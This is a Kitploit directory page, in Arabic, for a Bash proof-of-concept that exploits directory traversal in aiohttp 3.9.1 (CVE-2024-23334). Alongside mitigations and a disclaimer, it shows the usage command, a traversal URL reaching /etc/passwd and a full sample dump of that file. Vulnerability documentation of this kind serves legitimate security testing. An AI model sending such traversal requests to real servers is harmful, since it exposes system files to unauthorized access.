Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
LFI-aiohttp-CVE-2024-23334-PoC — نص برمجي Bash لأتمتة هجمات تضمين الملفات المحلية (LFI) على خادم aiohttp الإصدار 3.9.1. | Kitploit
أدوات/GitHubGitHub/theredp4nther/lfi-aiohttp-cve-2024-23334-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubtheredp4nther/lfi-aiohttp-cve-2024-23334-poc

LFI-aiohttp-CVE-2024-23334-PoC

نص برمجي Bash لأتمتة هجمات تضمين الملفات المحلية (LFI) على خادم aiohttp الإصدار 3.9.1.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
2منذ سنة واحدةلم تتم المراجعة بعد

LFI-aiohttp-CVE-2024-23334-PoC

نص برمجي بلغة Bash لأتمتة هجمات تضمين الملفات المحلية (LFI) على خوادم aiohttp الضعيفة، مع التركيز بشكل خاص على الثغرة CVE-2024-23334. يسمح هذا الاستغلال بالوصول غير المصرح به إلى الملفات التعسفية على الأنظمة التي تشغل إصدارات متأثرة من aiohttp مع مسارات ثابتة مهيأة بشكل غير صحيح.

الثغرة CVE-2024-23334

تؤثر الثغرة CVE-2024-23334 على إطار عمل خادم/عميل HTTP غير المتزامن aiohttp الخاص بلغة Python و asyncio. تنشأ هذه الثغرة عند استخدام aiohttp كخادم ويب مع مسارات ثابتة، مما قد يؤدي إلى ثغرات اجتياز الدليل إذا تم تكوينها بشكل خاطئ. يتيح ذلك للمهاجم الوصول إلى الملفات التعسفية على النظام دون تصريح.

تتضمن الإجراءات التخفيفية لهذه الثغرة ما يلي:

  • الترقية إلى إصدار aiohttp 3.9.2 أو أحدث، حيث تم حل المشكلة.
  • تعطيل خيار follow_symlinks في تكوين الخادم.
  • استخدام بروكسي عكسي لمنع الوصول المباشر إلى الملفات الحساسة.

الميزات

  • أتمتة هجمات اجتياز الدليل حتى 15 مستوى للوصول إلى الملفات المستهدفة.
  • تقديم تغذية راجعة حول توفر الخادم والتحقق من نجاح الوصول إلى الملف.
  • مسارات حمولة قابلة للتكوين لتكييف النص البرمجي مع بيئات اختبار محددة.

المتطلبات

  • curl: تأكد من تثبيت curl على نظامك، حيث يتم استخدامه لإجراء طلبات HTTP.

الاستخدام

لتشغيل النص البرمجي، قم بتنفيذ الأمر التالي:

./lfi_aiohttp.sh -f /path/to/file/to/dump

إذا سارت الأمور على ما يرام، يجب أن ترى نتيجة مشابهة لما يلي:

root@kitploit:~
[+] Curl output to the resulting url: http://localhost:8080/assets/../../..//etc/passwd.


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
rosa:x:1000:1000:rosa:/home/rosa:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
app:x:1001:1001:,,,:/home/app:/bin/bash
_laurel:x:997:997::/var/log/laurel:/bin/false

[+] File dumped successfully.

ملاحظة التكوين

هام: قد تحتاج متغيرات main_url و payload في النص البرمجي إلى التعديل اعتمادًا على البيئة المستهدفة.

  • main_url: يجب تعيين هذا المتغير على عنوان URL لخادم aiohttp الهدف (مثلاً http://localhost:8080). قم بتعديله وفقًا لعنوان الخادم الفعلي الذي تختبر ضده.
  • payload: يمثل هذا المتغير مسار الملف الثابت على الخادم (مثلاً /assets/). تأكد من أن هذا المسار يطابق تكوين دليل الملفات الثابتة للخادم الهدف.

قبل تشغيل النص البرمجي، راجع هذه المتغيرات للتأكد من تكوينها بشكل صحيح لسيناريو الاختبار الخاص بك. قد تؤدي الإعدادات غير الصحيحة إلى فشل محاولات الوصول إلى الملفات أو سلوك غير مقصود.

الوسائط

  • -f: يحدد الملف الذي سيتم تفريغه من الخادم.
  • -h: يعرض لوحة المساعدة مع تعليمات الاستخدام.

إخلاء المسؤولية

هذا النص البرمجي مخصص للأغراض التعليمية واختبار الاختراق المصرح به فقط. الاستخدام غير المصرح به لهذا النص البرمجي محظور وقد يكون غير قانوني.

تنزيل الأداة